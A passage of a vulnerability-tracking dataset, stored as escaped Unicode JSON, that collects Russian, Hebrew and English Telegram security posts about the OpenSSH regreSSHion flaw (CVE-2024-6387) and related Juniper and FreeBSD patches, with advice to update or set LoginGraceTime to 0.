\u043a\u043e\u0434 \u0432\u043e\u0437\u043d\u0438\u043a \u0438\u0437-\u0437\u0430 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 blacklistd \u0432 OpenSSH \u0432 FreeBSD, \u043a\u0430\u043a \u0437\u0430\u044f\u0432\u043b\u044f\u044e\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u0440\u043e\u0435\u043a\u0442\u0430.\n\n\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0432\u044b\u0437\u043e\u0432\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u043c\u0438 \u0434\u043b\u044f \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432 \u0432 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 sshd(8), \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root.\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c FreeBSD \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c sshd, \u0447\u0442\u043e\u0431\u044b \u0441\u043d\u0438\u0437\u0438\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0443\u0433\u0440\u043e\u0437\u044b.\n\n\u0412 \u0441\u043b\u0443\u0447\u0430\u044f\u0445, \u043a\u043e\u0433\u0434\u0430 sshd(8) \u043d\u0435 \u0443\u0434\u0430\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0440\u0435\u0448\u0435\u043d\u0430 \u043f\u0443\u0442\u0435\u043c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 LoginGraceTime \u043d\u0430 0 \u0432 /etc/ssh/sshd_config \u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0443\u0441\u043a\u0430 sshd(8), \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0434\u0435\u043c\u043e\u043d \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u043a DoS, \u043d\u043e \u0437\u0430\u0449\u0438\u0449\u0430\u0435\u0442 \u043e\u0442 RCE.", "creation_timestamp": "2024-08-12T19:55:38.000000Z"}, {"uuid": "9ac285d0-e3b2-45e6-b9c1-396aa3ee5970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/CyberSecurityIL/48512", "content": "\u05e9\u05d9\u05de\u05d5 \u05dc\u05d1 \u05dc\u05e9\u05ea\u05d9 \u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05d7\u05d3\u05e9\u05d5\u05ea \u05e9\u05e4\u05d5\u05e8\u05e1\u05de\u05d5 \u05dc\u05d0\u05d7\u05e8\u05d5\u05e0\u05d4, \u05d4\u05d0\u05d7\u05ea \u05d1\u05e9\u05e8\u05ea\u05d9 OpenSSH \u05d5\u05d4\u05e9\u05e0\u05d9\u05d4 \u05d1\u05de\u05d5\u05e6\u05e8\u05d9\u05dd \u05d4\u05d1\u05d0\u05d9\u05dd \u05e9\u05dc \u05d7\u05d1\u05e8\u05ea \u05d2'\u05d5\u05e0\u05d9\u05e4\u05e8:\n Session Smart Router (SSR), Session Smart Conductor, \u05d5- WAN Assurance Router\n\n1. \u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05d1- OpenSSH \u05d4\u05d9\u05d0 CVE-2024-6387, \u05e4\u05e8\u05d8\u05d9\u05dd \u05e0\u05d5\u05e1\u05e4\u05d9\u05dd \u05db\u05d0\u05df\n\n2. \u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05d1\u05de\u05d5\u05e6\u05e8\u05d9 \u05d2'\u05d5\u05e0\u05d9\u05e4\u05e8 \u05d4\u05d9\u05d0 CVE-2024-2973, \u05e4\u05e8\u05d8\u05d9\u05dd \u05e0\u05d5\u05e1\u05e4\u05d9\u05dd \u05db\u05d0\u05df.\n\n\u05e9\u05ea\u05d9 \u05d4\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05d4\u05d5\u05e4\u05d9\u05e2\u05d5 \u05de\u05d5\u05e7\u05d3\u05dd \u05d9\u05d5\u05ea\u05e8 \u05d1\u05e4\u05d9\u05d3 \u05d4\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05d5\u05d1\u05e4\u05d9\u05d3 \u05d4\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05d4\u05e7\u05e8\u05d9\u05d8\u05d9\u05d5\u05ea \u05d4\u05d6\u05de\u05d9\u05e0\u05d9\u05dd \u05dc\u05ea\u05d5\u05de\u05db\u05d9 \u05d4\u05e2\u05e8\u05d5\u05e5\n\nhttps://t.me/CyberSecurityIL/5369", "creation_timestamp": "2024-07-03T11:42:07.000000Z"}, {"uuid": "48ece771-6528-4985-96af-9be75b0284de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "exploited", "source": "https://t.me/thehackernews/5192", "content": "\ud83d\udea8 A critical OpenSSH flaw (CVE-2024-6387) allows unauthenticated remote code execution on glibc-based Linux systems. 14 million servers at risk.  \n \nhttps://thehackernews.com/2024/07/new-openssh-vulnerability-could-lead-to.html \n \nApply the latest patches now!", "creation_timestamp": "2024-07-01T14:38:27.000000Z"}, {"uuid": "984aa023-b935-465e-9da4-addba65a22ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/true_secator/6617", "content": "Juniper Networks \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442 2025 \u0433\u043e\u0434 \u0441 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0445 \u0434\u0435\u0441\u044f\u0442\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 Junos OS, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0445 \u043e\u0448\u0438\u0431\u043a\u043e\u043a.\n\n\u0412 \u0440\u0430\u043c\u043a\u0430\u0445 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 \u0437\u0430\u043a\u0440\u044b\u0442\u0430 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0447\u0442\u0435\u043d\u0438\u044f \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u043c\u0438 \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0431\u0443\u0444\u0435\u0440\u0430 \u0432 \u0434\u0435\u043c\u043e\u043d\u0435 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0446\u0438\u0438 (RPD) Junos OS \u0438 Junos OS Evolved, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0433\u043b\u0430 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a DoS \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0433\u043e \u043f\u0430\u043a\u0435\u0442\u0430 BGP.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2025-21598 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u044b \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u0442\u0440\u0430\u0441\u0441\u0438\u0440\u043e\u0432\u043a\u0438 \u043f\u0440\u0438\u0435\u043c\u0430 \u043f\u0430\u043a\u0435\u0442\u043e\u0432, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e AS, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0434\u043e\u0441\u0442\u0438\u0433\u043d\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432.\n\n\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043e\u0431\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0443\u0442\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043e\u043f\u0446\u0438\u0438 \u0442\u0440\u0430\u0441\u0441\u0438\u0440\u043e\u0432\u043a\u0438 \u043f\u0430\u043a\u0435\u0442\u043e\u0432. \u0414\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438, \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0438\u0441\u043a\u0430\u0442\u044c \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u044b\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043e\u0431 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\u0445 \u0432 \u0441\u043e\u0441\u0435\u0434\u043d\u0438\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 AS, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b.\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2025-21599 - \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0439 \u0434\u0435\u0444\u0435\u043a\u0442 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0435 Juniper Tunnel Driver (JTD) \u041e\u0421 Junos Evolved, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u043f\u043e \u0441\u0435\u0442\u0438 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u0432\u044b\u0437\u043e\u0432\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f DoS.\n\n\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 IPv6, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u043f\u0430\u043c\u044f\u0442\u044c \u044f\u0434\u0440\u0430 \u043d\u0435 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0430\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0435\u0435 \u0438\u0441\u0447\u0435\u0440\u043f\u0430\u043d\u0438\u044e. \u041d\u0435\u043f\u0440\u0435\u0440\u044b\u0432\u043d\u043e\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u044d\u0442\u0438\u0445 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u0431\u0443\u0434\u0443\u0442 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0442\u044c \u0438\u0441\u0442\u043e\u0449\u0430\u0442\u044c \u043f\u0430\u043c\u044f\u0442\u044c \u044f\u0434\u0440\u0430, \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u044f \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u043e\u0435 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 DoS.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0432 OpenSSH, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 Junos OS \u0438 Junos OS Evolved, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0445 \u043a\u0430\u043a CVE-2024-6387 (regreSSHion) \u0438 CVE-2024-39894.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, Juniper \u0442\u0430\u043a\u0436\u0435 \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0430 \u043e \u0432\u044b\u043f\u0443\u0441\u043a\u0435 Junos Space 24.1R2 \u0441 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438 \u043f\u043e\u0447\u0442\u0438 60 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u0445 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0430\u0445, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0432 Expat (libexpat), \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 XML-\u0430\u043d\u0430\u043b\u0438\u0437\u0430\u0442\u043e\u0440\u0430.\n\n\u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u0447\u0438\u0441\u043b\u043e \u043e\u0448\u0438\u0431\u043e\u043a \u0441\u0440\u0435\u0434\u043d\u0435\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0432 Junos OS \u0438 Junos OS Evolved, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u043b\u0438 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a DoS-\u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f\u043c \u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044e \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.\n\n\u041d\u0438 \u043e\u0434\u043d\u0430 \u0438\u0437 \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043f\u043e-\u0432\u0438\u0434\u0438\u043c\u043e\u043c\u0443, \u043d\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445, \u043d\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0435\u0440\u0435\u0434\u043a\u043e\u00a0\u043d\u0430\u0446\u0435\u043b\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b \u0441 \u041e\u0421 Junos.", "creation_timestamp": "2025-01-14T13:40:05.000000Z"}, {"uuid": "ec554bee-3169-4a3a-9373-503a0a727a89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/true_secator/5919", "content": "\u041c\u0438\u043b\u043b\u0438\u043e\u043d\u044b \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 OpenSSH \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u0437-\u0437\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 regreSSHion.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-6387 \u0438 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f\u043c\u0438 Qualys, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0435\u0435 \u0443\u0436\u0435 \u043f\u0440\u0438\u0440\u0430\u0432\u043d\u044f\u043b\u0438 \u043f\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u0438 \u043a Log4Shell\u00a02021 \u0433\u043e\u0434\u0430.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0447\u0442\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 OpenSSH \u00absshd\u00bb \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044e \u0433\u043e\u043d\u043a\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 root.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Linux \u043d\u0430 \u0431\u0430\u0437\u0435 glibc, \u043f\u043e Windows \u0438 macOS - \u043f\u043e\u043a\u0430 \u0435\u0449\u0435 \u043d\u0435\u044f\u0441\u043d\u043e.\n\n\u041a\u043e\u043d\u0435\u0447\u043d\u044b\u043c \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f regreSSHion \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043b\u043d\u0430\u044f \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u044e\u0449\u0430\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c RCE \u0441 \u043d\u0430\u0438\u0432\u044b\u0441\u0448\u0438\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438, \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u0440\u0430\u0436\u0443 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0434\u0430\u0436\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0442\u044c \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f.\n\nOpenSSH, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u044b\u0439 \u0434\u043b\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u043a\u0430\u043d\u0430\u043b\u0430 \u043f\u043e \u0441\u0435\u0442\u0438 \u0432 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0435 \u043a\u043b\u0438\u0435\u043d\u0442-\u0441\u0435\u0440\u0432\u0435\u0440, \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f\u043c\u0438 \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Qualys, \u043f\u043e\u0438\u0441\u043a Shodan \u0438 Censys \u0432\u044b\u0434\u0430\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 14 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u043e\u0432 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 OpenSSH, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0438\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430.\n\n\u0421\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Qualys \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442, \u0447\u0442\u043e \u043e\u043a\u043e\u043b\u043e 700 000 \u0441\u0438\u0441\u0442\u0435\u043c, \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0445 \u043a \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0443, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b.\n\n\u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e CVE-2024-6387 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0440\u0435\u0433\u0440\u0435\u0441\u0441 \u0440\u0430\u043d\u0435\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2006-5051 \u0438 